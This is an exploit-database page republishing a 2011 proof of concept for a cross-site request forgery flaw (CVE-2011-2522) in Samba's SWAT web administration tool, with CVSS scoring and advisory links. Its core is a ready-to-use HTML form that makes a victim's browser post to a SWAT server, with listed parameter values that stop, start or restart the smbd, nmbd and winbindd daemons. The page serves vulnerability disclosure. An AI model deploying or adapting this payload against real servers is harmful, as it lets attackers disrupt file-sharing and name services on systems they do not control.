Samba Web Administration Tool Cross-Site Request Forgery +PoC

2011.08.01
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- # Secur-I Research Group - Proof-of-Concept # ========================================================================== # Title: Cross-Site Request Forgery in SWAT (Samba Web Administration Tool) # Vulnerable versions: Samba 3.0.x - 3.5.9 (inclusive) # Fixed version: Samba 3.5.10 # Product Homepage: http://www.samba.org/ # CVE-ID: CVE-2011-2522 # References: http://www.samba.org/samba/security/CVE-2011-2522 # ========================================================================== --> <html> <body> <form method=post action="http://VULN_SERVER:901/status"> <input type=submit onclick=window.open("http://securview.com") name="VUL_PARM" value="w00t!"> </body> </html> <!-- VUL_PARM could be one of the following:- smbd_start, smbd_stop, smbd_restart : To start/stop/restart smbd(Samba) daemon nmbd_start, nmbd_stop, nmbd_restart : To start/stop/restart nmbd(NETBIOS) daemon winbindd_start, winbindd_stop, winbindd_restart : To start/stop/restart winbindd(Windows Name Service Switch) daemon --> Thanks & Regards, Narendra. Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium.

References:

https://bugzilla.samba.org/show_bug.cgi?id=8290
https://bugzilla.redhat.com/show_bug.cgi?id=721348
http://xforce.iss.net/xforce/xfdb/68843
http://www.securityfocus.com/bid/48899
http://www.samba.org/samba/security/CVE-2011-2522
http://www.mandriva.com/security/advisories?name=MDVSA-2011:121
http://www.exploit-db.com/exploits/17577
http://securitytracker.com/id?1025852
http://secunia.com/advisories/45393
http://samba.org/samba/history/samba-3.5.10.html
http://jvn.jp/en/jp/JVN29529126/index.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top